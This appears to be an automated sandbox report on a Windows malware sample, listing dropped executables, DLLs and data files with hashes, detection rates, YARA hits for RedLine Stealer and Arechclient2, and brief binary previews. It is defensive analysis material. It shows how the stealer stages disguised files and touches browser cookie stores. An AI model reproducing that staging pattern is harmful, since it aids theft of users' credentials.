Preview:	>C&.<C&.=C&.=C&.<C&..C&.)C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C'...v.y.r...k.^1I.R%R.jH.R4U.n7G.Ick.S6z.O,A.\.U.n7G.I6V.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.~,o.T7O.Q\.x;&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.~,e.X"R.t-U.\-E.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&...o.y.t.a.O.O,U.[7..x.z.O"K.J,T.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.Kq...v...t&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.

C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5qk.0.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	545792
Entropy (8bit):	6.384805269039956
Encrypted:	false
SSDEEP:	6144:yU3iKBTO7hQqRGoFyLmVmH6Q4vwRuGuoBhYkuFqeYAOfp+5ic6/:yU7UVGoFyLmVO6Q6wAGuoBh9Np+M/
MD5:	6C93FC68E2F01C20FB81AF24470B790C
SHA1:	D5927B38A32E30AFCF5A658612A8266476FC4AD8
SHA-256:	64A71B664D76641B35DAC312161CB356B3B3B5F0B45C9D88C8AFA547B4902580
SHA-512:	355E9677121EF17CF8C398F0C17399776D206C62014080A2C62682E1152EA0729DCC6E233358DCD6BAE009B07E3DB936D4B18EB37D6E7EBC2FE9CF8D827C4ADE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 47%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'i..'i..'i....[.7i....Y..i....X.8i...7..3i...7...i...7...i....9."i..'i..}i...7..%i...7U.&i..'i=.&i...7..&i..Rich'i..................PE..L....v)f..........................................@.......................................@.................................P...(.......@(................... ..l.......p........................... ...@............................................text...1........................... ..`.rdata..............................@..@.data...@ ..........................@....gfids..............................@..@.rsrc...@(.......*..................@..@.reloc..l.... ......................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5qk.3.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4718
Entropy (8bit):	5.4831065547536815
Encrypted:	false
SSDEEP:	96:EJuy6ePkmFdRN9QAiMPZPZPZPZPKPKPEPEPEPEP1P1P1P50uPf2C:W3PkmFdRN9QAiMPZPZPZPZPKPKPEPEPv
MD5:	B94233986DB09F6CF022E905B73861A6
SHA1:	6627B31AD08384B64F156546B19727A63BBDBE39
SHA-256:	9F0FF0A77A4C1C9754884B217661538E546AA0412D3D05673C3D698654FB793E
SHA-512:	8F83106B430ED8CE360D4247B0F03EE7EF1970B328720E0E713C6A23D9E6214F8963E314A8A99BF3BD672E99E249F1D84FCCBD23E042881C02E10320DB40042B
Malicious:	false
Preview:	[04/27/24 01:31:56] Main : OS Version = osWin10...[04/27/24 01:31:56] CommandLineSwitchExists : Result of check = False. Param Value (if not exact match) = ...[04/27/24 01:32:00] Installer Target URL request = {"IPAddress":"192.168.2.4","Status":1,"Language":"en","OSMinorVersion":0,"OSMajorVersion":10,"ProductId":"5488CB36-BE62-4606-B07B-2EE938868BD1","Is64Bit":true,"ECommId":"11A12794-499E-4FA0-A281-A9A9AA8B2685"}...[04/27/24 01:32:01] Installer target url response = {"Url":"https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe","ProductName":"System Mechanic Standard","Result":0,"ErrorMessage":null}...[04/27/24 01:32:01] DownloadAndLaunchInstaller : Creating BITS download handler...[04/27/24 01:32:01] !&TioloBITSHandler.InitCopyMgr : CreateCOMObject(CLSID_BackgroundCopyManager1_5)..[04/27/24 01:32:01] !&TioloBITSHandler.InitCopyMgr : Copy manager initialized = True...[04/27/24 01:32:01] DownloadAndLaunchInstaller : Target folder ="C:\User

C:\Users\user\AppData\Local\Temp\mfftjmsft

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Apr 24 04:56:20 2024, mtime=Fri Apr 26 22:31:28 2024, atime=Wed Apr 24 04:56:20 2024, length=2469936, window=hide
Category:	dropped
Size (bytes):	1063
Entropy (8bit):	4.991177146276046
Encrypted:	false
SSDEEP:	24:85J4mCkoiMXROgK8I5PGr90yAjfKPKr2snqyFm:8RCkuXRvy7RjVEyF
MD5:	43B7EB3FDD814ED3F812E75F06C958DE
SHA1:	FA758084AFAAB30A8CEAE84D88838A712F3E7C9D
SHA-256:	EF31853CEE1A15DCCDC04203E94E0C5CB9CF8E4CA929090B3FA5555589A02688
SHA-512:	F939EBC0FCC6D596BF13ACB38C65027C6A563E72F23B02F050FC898705902665D2589E2544810DB118433E2EADF6E055029C725C136025C781F2FEFF3BF5B760
Malicious:	false
Preview:	L..................F.... ....Z.!......1....Z.!....0.%.......................:..DG..Yr?.D..U..k0.&...&......vk.v....K.$.1...h4..1.......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X............................%..A.p.p.D.a.t.a...B.P.1......X...Local.<......CW.^.X.....b.........................L.o.c.a.l.....N.1......X...Temp..:......CW.^.X.....l....................._.H.T.e.m.p.....T.1......X...u5qk.2..>......X.X.....D......................_..u.5.q.k...2.....V.2.0.%..X./ .run.exe.@......X./.X..............................r.u.n...e.x.e......._...............-.......^...................C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe......\.u.5.q.k...2.\.r.u.n...e.x.e.........\|....I.J.H..K..:...`.......X.......971342...........hT..CrF.f4... ...T..b...,.......hT..CrF.f4... ...T..b...,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.........9.

C:\Users\user\AppData\Local\Temp\nkho

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	786944
Entropy (8bit):	6.809298494568767
Encrypted:	false
SSDEEP:	12288:wvsXZv8km0OHcbGbvzWHz0Hnquwxe+w0ssFWylkkoAbtEjrwfNqbYS2VbICKMIUO:jfPz0Hynw0ssFlSjT7L
MD5:	5AEBA331CE853D10C82B56ADC96C9E80
SHA1:	A208059F9591712ABF451114815B693AB14A5AB3
SHA-256:	EC51C3B08183CFE851DC93877A6F5B38CA8DD2E5D68E014A2B44C98078ED3434
SHA-512:	5DAACA835F0C9F5691D79CDDE45EF6887EACA6123F65994F8A90A42FF63B35DF6605F673E671004CC8F61B7EE0671ED9F25841A2D9EFEFF5EFC8DA8391CC6676
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\nkho, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\nkho, Author: Joe Security Rule: MALWARE_Win_Arechclient2, Description: Detects Arechclient2 RAT, Source: C:\Users\user\AppData\Local\Temp\nkho, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 65%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......]................................. ........@.. .......................`..............................................T...W.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......L....>..........T...@............................................0............. ....X..%-.&sp...sq...}-..... ....Y.~-.....UY.).... .....7...%.....~,.....[Y.)....sr...~-.....TY.)....os.........%.~t.... ....X~t.... ....X~t.... ....X(.....%.~-.....SY.)......~-.....RY.)....~0...%-.&~/.........su...%.0...(...+}.....0........... ....X..{M.....0............(..... .p..Y. ...@\...\a..Z3.+.~t.... .M..X+2~...... ....^ ...l_.3.+. 4.rc H:;..+.~t.... ...X..#.......@. ..... ....\

C:\Users\user\AppData\Local\Temp\ssfwvk

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	786944
Entropy (8bit):	6.809298494568767
Encrypted:	false
SSDEEP:	12288:wvsXZv8km0OHcbGbvzWHz0Hnquwxe+w0ssFWylkkoAbtEjrwfNqbYS2VbICKMIUO:jfPz0Hynw0ssFlSjT7L
MD5:	5AEBA331CE853D10C82B56ADC96C9E80
SHA1:	A208059F9591712ABF451114815B693AB14A5AB3
SHA-256:	EC51C3B08183CFE851DC93877A6F5B38CA8DD2E5D68E014A2B44C98078ED3434
SHA-512:	5DAACA835F0C9F5691D79CDDE45EF6887EACA6123F65994F8A90A42FF63B35DF6605F673E671004CC8F61B7EE0671ED9F25841A2D9EFEFF5EFC8DA8391CC6676
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\ssfwvk, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\ssfwvk, Author: Joe Security Rule: MALWARE_Win_Arechclient2, Description: Detects Arechclient2 RAT, Source: C:\Users\user\AppData\Local\Temp\ssfwvk, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 65%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......]................................. ........@.. .......................`..............................................T...W.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......L....>..........T...@............................................0............. ....X..%-.&sp...sq...}-..... ....Y.~-.....UY.).... .....7...%.....~,.....[Y.)....sr...~-.....TY.)....os.........%.~t.... ....X~t.... ....X~t.... ....X(.....%.~-.....SY.)......~-.....RY.)....~0...%-.&~/.........su...%.0...(...+}.....0........... ....X..{M.....0............(..... .p..Y. ...@\...\a..Z3.+.~t.... .M..X+2~...... ....^ ...l_.3.+. 4.rc H:;..+.~t.... ...X..#.......@. ..... ....\

C:\Users\user\AppData\Local\Temp\tmpFF68.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\u5qk.0.exe

Download File

Process:	C:\Users\user\Desktop\VucRf0jboS.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	294400
Entropy (8bit):	6.775734273220201
Encrypted:	false
SSDEEP:	3072:OWQIEzppxOM5hr+py88Z2M6Hu/0u3zgxilg/JKh96N1n7eLIcvgfLI97lfm2DcpD:8zOqquB3ExilCU9e1dcULIDfvDofIK
MD5:	17342752EC286810D28AA4F324C3E8E5
SHA1:	0B76392265510932C5DA48ECCD34F12A907A7A52
SHA-256:	BDC140235BCA5526E0F1FC88C14ADF1DDD7956F27F4357B8D283D31EFC767800
SHA-512:	3FE29DA5F3263B904D07145677EBDB6035E976F90816DC2C22A5E5932F20EEBBE2F36B5AE1F65E8FFB0D1C4256D8E0B44E711714044F2023BB4C7B14AB902F50
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ku.[Ku.[Ku.[F'e[Uu.[F'Z[.u.[F'[[du.[B.)[Hu.[Ku.[;u.[.._[Ju.[F'a[Ju.[..d[Ju.[RichKu.[................PE..L....4Qd.....................<.......A.......0....@.............................................................................(........h...................`..T....2..8..............................@............0...............................text............................... ..`.rdata...l...0...n..................@..@.data...HL.......r..................@....rsrc....h.......j..................@..@.reloc..T....`.......h..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\u5qk.1.zip

Download File

Process:	C:\Users\user\Desktop\VucRf0jboS.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	3884863
Entropy (8bit):	7.9982714074161665
Encrypted:	true
SSDEEP:	98304:7goFFJ7lj6j1elkeoTNxPxDZhAryYACWcTIxlN+ba:7guJ7wpfTDPxD0P2YG
MD5:	78D3CA6355C93C72B494BB6A498BF639
SHA1:	2FA4E5DF74BFE75C207C881A1B0D3BC1C62C8B0E
SHA-256:	A1DD547A63B256AA6A16871ED03F8B025226F7617E67B8817A08444DF077B001
SHA-512:	1B2DF7BEE2514AEE7EFD3579F5DD33C76B40606D07DBA69A34C45747662FAD61174DB4931BCA02B058830107959205E889FEE74F8CCC9F6E03F9FD111761F4EA
Malicious:	false
Preview:	PK.........?.X........I......bunch.dat\]...:.... "...T.......N<wf..X $;.e..)....\|u]+...UV.~.....f.Rje.......@.f.r..V....J-.#U.....=.T..E.5.Z..&..z...'.k..%..Je.....[5.....P..B...@........G..z[.-B1....Jz#....%.J...j...W........>62.jK(...........E.T.Q}.j._I..R.TEj.>..O..:J%o.......`.f+O...W>.....S.INC.m.6..\|wQ.xk.K.....o.D....:.n4....P>..M._\|...P.R@.gW...k..X...MbM.....H....... .....#o.CC.!...1!R.g....Qc "P....Q.3.H.B.F.\|...)...........@..W.6..Z..7.9.....d'`_.6.zr%a......7.,...l....h.v......P.O.f..!..Y..#..Y.7..g..v=..k....J...N#\.5.....]......<.VGU.~....,..X.o.k..#..?v..%.0.+...m.(m..ah.JG>.....m..V......kb...B.jX...V$p... ..?.<....^...%KA=0\.(......Q.l>.;x..#W.@@.tIU ...Q............./e.7Ew..}h..^N... ........+.........bRz.........2r.f..u'o..s.}1...j.{.'%.......?..Z..M.....9.\|P..W.o...c...3....H\.4..B......;14.65.Q3....24$...2(..9j......!.$..<<....P#b..Lj.D.vG.+.}.T..6tR..b."..o.f...h>.......Z..5.(....]........

C:\Users\user\AppData\Local\Temp\u5qk.2\UIxMarketPlugin.dll

Download File

Process:	C:\Users\user\Desktop\VucRf0jboS.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1640960
Entropy (8bit):	6.484662993855079
Encrypted:	false
SSDEEP:	49152:/7Q2CH7FiYk7q8wOP2nyh9VgFdJYZL6MsQv4Pvg3KIA8wuSgKacXTT3Kos2lpm:sZH7FZk7LP2nyh9VgFdJYZL6NQgPVIAv
MD5:	D1BA9412E78BFC98074C5D724A1A87D6
SHA1:	0572F98D78FB0B366B5A086C2A74CC68B771D368
SHA-256:	CBCEA8F28D8916219D1E8B0A8CA2DB17E338EB812431BC4AD0CB36C06FD67F15
SHA-512:	8765DE36D3824B12C0A4478C31B985878D4811BD0E5B6FBA4EA07F8C76340BD66A2DA3490D4871B95D9A12F96EFC25507DFD87F431DE211664DBE9A9C914AF6F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 18%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?.e.^.6.^.6.^.6.&K6.^.6.&[6.^.6.^.6.].6.(V6.^.6.(b6[^.6.(c6._.6.(g6.^.6.(S6.^.6.(R6.^.6.(U6.^.6Rich.^.6................PE..L.....kU...........%.........4............................................................@..........................*..........T............................ .........................................@............................................text............................... ..`.rdata..Y;.......<..................@..@.data........0...^..................@....rsrc................p..............@..@.reloc..d.... .......v..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\u5qk.2\bunch.dat

Download File

Process:	C:\Users\user\Desktop\VucRf0jboS.exe
File Type:	data
Category:	dropped
Size (bytes):	1329417
Entropy (8bit):	7.898171122766659
Encrypted:	false
SSDEEP:	24576:7vktfYOP8kCc3P/X970uBuBFA3S8Fa+/D9kGmk3Lh9AvPG:7vk5H8LIt1e2Sl+if2YG
MD5:	1E8237D3028AB52821D69099E0954F97
SHA1:	30A6AE353ADDA0C471C6ED5B7A2458B07185ABF2
SHA-256:	9387488F9D338E211BE2CB45109BF590A5070180BC0D4A703F70D3CB3C4E1742
SHA-512:	A6406D7C18694EE014D59DF581F1F76E980B68E3361AE680DC979606A423EBA48D35E37F143154DD97FE5F066BAF0EA51A2E9F8BC822D593E1CBA70EAD6559F3
Malicious:	false
Preview:	...BPM.M.oe....Z.I..Y..t.........RIP\u.fZG..cFQ......h...DAO.P\...j...g.T..id..a...^.PttPbo..ei.i.Z..W.y.g..T_..bMVj.wWAP.v]..xQW..tW.kq..._q.B.nn....p.v.Ds.a.F...vT.Yga.o..A\PM..M.]s...u.lp[.sGmuvB.`YB..g.U....HTB[PU.y..moby..N..q...E.EOs.Q.C[C..^oAOo..sfe....wg.Z....Z...R.kx.DS.WYq.]..dXb.[k.xe.eQc..Z..L..IZ.X.f.x..q..u....Y.[ZH..[v..J.dT.I....RA._OW.x.cK..G]...xwZ....f.Nl`.p.ZS.yJ.J.p..`hn.hYg..u....[Qernk....P[.jJ.....l..RNf......ya.s.M...S.^[TyM..U.fFQ...w..v.KFw.X.....oS[h...NRj..UYt.....nM..d..G.R]j.x...Y.C..b....U.as`GOT.......T.d.GVQV...[.Ct[.`w.R..Vc..O.D.`.dH.jm..S[...Q.....LmoTY.D_.IM...uCtDVt.oW..LK.E..........Ek.fxT.e.f.p.a.O....gaQ.g.O..K.N..l.].......f.Z.[o...HVTJB.l.d.GYVD.U.o....^.F..uH.LH.n.f....Hx^kON..kT.Tld.T.KV.[...MM\NL...Z...R....pd......j..m.DhIFCSO..eMf.W..c.C.[..h.....y.^A..S.W...i.n....N.E.w_....QSGKKF.k.d.g..O...r...o..EKUV.....J...r...I..HU...]xFd.aq..GTC.s.a.p..J....r^GYK.P.C.....qH.....a[..V...FJIsJ._.WTIvtKE.k.me[...H..wTw.a....c...n[_.l...f.I....axf`O

C:\Users\user\AppData\Local\Temp\u5qk.2\relay.dll

Download File

Process:	C:\Users\user\Desktop\VucRf0jboS.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1596416
Entropy (8bit):	6.46619614175955
Encrypted:	false
SSDEEP:	49152:n2gm39uH+I5/GxEoadcqX7Q9F7r40YB+eTcq+PDXx1lWz0v2:DmtuH+e/RoadcqX7Qz7rDY8vq+Pbx1lc
MD5:	10D51BECD0BBCE0FAB147FF9658C565E
SHA1:	4689A18112FF876D3C066BC8C14A08FD6B7B7A4A
SHA-256:	7B2DB9C88F60ED6DD24B1DEC321A304564780FDB191A96EC35C051856128F1ED
SHA-512:	29FAF493BB28F7842C905ADC5312F31741EFFB09F841059B53D73B22AEA2C4D41D73DB10BBF37703D6AEB936FFACBC756A3CC85BA3C0B6A6863EF4D27FEFCD29
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S1,..PB..PB..PB.x&.<PB.x&.PB.x&.cQB..(...PB..(.>PB..PC..SB.x&..PB.x&..PB.x&..PB.x&..PB.Rich.PB.........PE..L.....kU...........%.....\...........0.......p......................................1.....@.................................dP..\|....p..........................z....}..................................@............p..,............................text...6Z.......\.................. ..`.rdata..J....p.......`..............@..@.data...\........Z...t..............@....rsrc........p......................@..@.reloc..6...........................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe

Download File

Process:	C:\Users\user\Desktop\VucRf0jboS.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2469936
Entropy (8bit):	6.434916453080517
Encrypted:	false
SSDEEP:	49152:Y8UMSn5cV2N9LNwtQ5gRR+moI1axGbYj6QAl4ImDkg7d5lROCDG5yzlC97W+uJUM:QMS5hN9OtQ5gRjoI8xGbYj6QAl4gg7dF
MD5:	9FB4770CED09AAE3B437C1C6EB6D7334
SHA1:	FE54B31B0DB8665AA5B22BED147E8295AFC88A03
SHA-256:	A05B592A971FE5011554013BCFE9A4AAF9CFC633BDD1FE3A8197F213D557B8D3
SHA-512:	140FEE6DAF23FE8B7E441B3B4DE83554AF804F00ECEDC421907A385AC79A63164BD9F28B4BE061C2EA2262755D85E14D3A8E7DC910547837B664D78D93667256
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]..<...<...<...D...<...J...<...J).A<...J(..=...D...<...<...?...J,..=...J...<...J...<..Rich.<..........................PE..L... .kU..........................................@..........................0&......&&...@.................................H. ......0"...............%.0 ...."..K...................................C..@...............,..... .@....................text............................... ..`.rdata...=.......>..................@..@.data....-....!....... .............@....rsrc........0".......!.............@..@.reloc...N...."..P...@".............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\u5qk.2\whale.dbf

Download File

Process:	C:\Users\user\Desktop\VucRf0jboS.exe
File Type:	data
Category:	dropped
Size (bytes):	87278
Entropy (8bit):	4.38402884518968
Encrypted:	false
SSDEEP:	1536:X5B5jj6bWG+5cAD2Fno6ktTgDa+0rldAe7VwDb4bWTfmdI7p:X5Ljj6bi512Fn3b0Ie7qgbWd9
MD5:	A723BF46048E0BFB15B8D77D7A648C3E
SHA1:	8952D3C34E9341E4425571E10F22B782695BB915
SHA-256:	B440170853BDB43B66497F701AEE2901080326975140B095A1669CB9DEE13422
SHA-512:	CA8EA2F7F3C7AF21B5673A0A3F2611B6580A7ED02EFA2CFD8B343EB644FF09682BDE43B25EF7AAB68530D5CE31DCBD252C382DD336ECB610D4C4EBDE78347273
Malicious:	false
Preview:	......P..E.o...]k.`...Y.....q.rsD.o.QPk.]fpZl\.R....DG..vyH^Q.....tpW........kgE.p.`O...............X..S.....x.....`.R.fZ.N...M..h...yC..H.O.XMQiV..sq..Ai.lV...Pv..WO].be.sU.nU..rGe.P....BE.MSnb.Lq....o.p..a.s..a..fEa..R..U.sNC.qZwI...XJ.M..H.h.........d.TSZR.UqXFj....Z.U..XTN.......B.CK...S._.^pjLRnbG^.u.D...mx..e......IYlK.l.....p._p.S.l...BZu..q.UG\.U....y.Xdi..Ff...rmqJ..V.AM.os.Oy..FV.._bNiEyiPIL.AW..GD.....che..iGU.oSi.Y..Yt.\].i.x.N.KN.`FKscyQ.M.....pqhieCU.c.ru..Melr.YRAM.Tg.......]..r.b.pP...._..gUo.`QvN.]il..G...q...NP.m.qHi.iiJ_^.[.Y...e.oHy.p.]..a...X.o....A.cL.C.A.._cQp..oD.L.L.O_.ewev.peB.ia..Ay.t.Y\W.]..l.F._i.....^.gDZTDNUj..dDM..o...........m..E........N.X..x...v..Cg....VuJ.k...Ec..JW`^yZ.u.B.im....T...C\.x..Z.G]B....u.r..gn.V...Q...mnN.quc.rM\..S...AjY.oVTa.p.Oebr.g........eC[A....cvqB..Ed..q.kR..BiYg`bQcA.E.XKs.\o.C..qyjUm.o..C..sc.F.xlnVI.q..q.Vs...p.Bg..O.dha..t..O.`x....c.n.....xr...f.ggn.LR[S..Aqk.j..u....nb.`Gd^...b.fYKZ^R..l...c..EbGm.pq..s..qwjn.`P...b..JE...t

C:\Users\user\AppData\Local\Temp\u5qk.3.exe

Download File

Process:	C:\Users\user\Desktop\VucRf0jboS.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4866096
Entropy (8bit):	6.542818068158205
Encrypted:	false
SSDEEP:	49152:1ZRCckM8wwGbtBiRFWSGqCW4FL5wslsAEL1ksS2NHsF3TjZ1I6bqmHC0Jg:1ZRCwrb64XwWsAwFaFXxg
MD5:	397926927BCA55BE4A77839B1C44DE6E
SHA1:	E10F3434EF3021C399DBBA047832F02B3C898DBD
SHA-256:	4F07E1095CC915B2D46EB149D1C3BE14F3F4B4BD2742517265947FD23BDCA5A7
SHA-512:	CF54136B977FC8AF7E8746D78676D0D464362A8CFA2213E392487003B5034562EE802E6911760B98A847BDDD36AD664F32D849AF84D7E208D4648BD97A2FA954
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....X..................5..P......`.5.......5...@...........................J.....`.J..........@............................7..N....<...............J.0(...08.............................. 8......................7.......8......................text...h.5.......5................. ..`.itext..<=....5..>....5............. ..`.data....V....5..X....5.............@....bss.....m...@7...... 7..................idata...N....7..P... 7.............@....didata.......8......p7.............@....tls....@.....8......z7..................rdata....... 8......z7.............@..@.reloc.......08......\|7.............@..B.rsrc.........<.......<.............@..@..............J.......J.............@..@........................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5qk.0.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5qk.0.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1640960
Entropy (8bit):	6.484662993855079
Encrypted:	false
